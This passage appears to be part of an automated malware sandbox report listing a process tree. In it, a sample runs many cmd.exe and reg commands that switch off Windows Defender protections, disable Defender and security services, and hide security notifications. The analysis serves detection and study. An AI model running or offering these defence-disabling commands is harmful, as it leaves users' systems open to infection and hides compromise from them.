  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:5704
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:5712
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4312
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:2268
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:3684
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:3652
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f"
  2⤵
  PID:4964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f"
  2⤵
  PID:2456
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:3784
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:5732
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:2360
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:2220
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:4996
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:1656
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /t REG_DWORD /d 1 /f"
  2⤵
  PID:3284
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:3560
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /t REG_DWORD /d 10 /f"
  2⤵
  PID:2764
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:4952
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:1760
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:5760
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5752
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f"
  2⤵
  PID:3536
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:1268
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /t REG_DWORD /d 1 /f"
  2⤵
  PID:5768
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:3440
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /t REG_DWORD /d 0 /f"
  2⤵
  PID:2852
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /t REG_DWORD /d 0 /f"
  2⤵
  PID:2744
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:1640
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:4976
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5776
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:5784
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:1600
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /t REG_DWORD /d 0 /f"
  2⤵
  PID:5788
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f"
  2⤵
  PID:3920
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /t REG_DWORD /d 0 /f"
  2⤵
  PID:3488
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f"
  2⤵
  PID:5808
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /t REG_MULTI_SZ /d 0 /f"
  2⤵
  PID:1816
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"
  2⤵
  PID:4236
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:960
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2452
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f"
  2⤵
  PID:2728
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:3076
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:2540
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:4456
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:5920
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:5840
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:4384
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:5900
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  PID:5828
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /f
  2⤵
  PID:4844
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /f"
  2⤵
  PID:3960
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /f"
  2⤵
  PID:3136
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /f"
  2⤵
  PID:3000
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /f"
  2⤵
  PID:5068
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /f"
  2⤵
  PID:5816
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /f"
  2⤵
  PID:4048
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /f"
  2⤵
  PID:2824
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /f
  2⤵
  PID:4868
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /f
  2⤵
  PID:2252
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /f"
  2⤵
  PID:4380
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f"
  2⤵
  PID:4516
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /f"
  2⤵
  PID:932
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /f"
  2⤵
  PID:3084
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /f"
  2⤵
  PID:5952
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /f"
  2⤵
  PID:5948
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /f"
  2⤵
  PID:5984
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /f"
  2⤵
  PID:5852
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /f"
  2⤵
  PID:4324
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /f"
  2⤵
  PID:3948
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /f"
  2⤵
  PID:5912
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f"
  2⤵
  PID:2408
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /f"
  2⤵
  PID:5964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /f"
  2⤵
  PID:5860
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /f"
  2⤵
  PID:5896
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /f"
  2⤵
  PID:5848
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /f"
  2⤵
  PID:3984
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /f"
  2⤵
  PID:5028
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /f"
  2⤵
  PID:5876
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /f"
  2⤵
  PID:5924
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /f"
  2⤵
  PID:964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /f"
  2⤵
  PID:2428
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /f"
  2⤵
  PID:680
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /f"
  2⤵
  PID:4804
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /f"
  2⤵
  PID:3800
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /f"
  2⤵
  PID:4224
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /f"
  2⤵
  PID:3680
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /f"
  2⤵
  PID:1248
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /f"
  2⤵
  PID:3500
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1780
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /f"
  2⤵
  PID:5112
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /f"
  2⤵
  PID:3152
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /f"
  2⤵
  PID:3944
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /f"
  2⤵
  PID:3792
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /f"
  2⤵
  PID:1252
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /f"
  2⤵
  PID:3720
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /f"
  2⤵
  PID:1744
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /f"
  2⤵
  PID:3916
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2960
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /f"
  2⤵
  PID:5052
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /f"
  2⤵
  PID:4836
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /f"
  2⤵
  PID:5012
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /f"
  2⤵
  PID:2980
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /f"
  2⤵
  PID:3952
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:5960
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 2 /f
  2⤵
  PID:1364
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:5532
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:5588
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 0 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1140
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 0 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5544
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:5976
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:5944
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 1 /f
  2⤵
  PID:6032
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 1 /f
  2⤵
  PID:1568
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  PID:5060
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /t REG_EXPAND_SZ /d %%windir%%\system32\SecurityHealthSystray.exe /f
  2⤵
  PID:4852
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c %SYSTEMROOT%\System32\OneDriveSetup.exe
  2⤵
  PID:4308
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c %SystemRoot%\SysWOW64\OneDriveSetup.exe
  2⤵
  PID:4452
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f"
  2⤵
  PID:4740
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:772
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:2760
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  PID:4156
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f"
  2⤵
  PID:5992
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f"
  2⤵
  PID:6008
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /t REG_DWORD /d 1 /f"
  2⤵
  PID:3344
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT / v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
  2⤵
  PID:4208
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
  2⤵
  PID:1560
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t REG_DWORD /d 1 /f"
  2⤵
  PID:1728
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  PID:3616
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f"
  2⤵
  PID:3312
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /t REG_DWORD /d 0 /f"
  2⤵
  PID:2272
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /t REG_DWORD /d 1 /f"
  2⤵
  PID:6044
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f"
  2⤵
  PID:6060
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:4296
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:5160
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:1548
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:5088
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:4372
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:6036
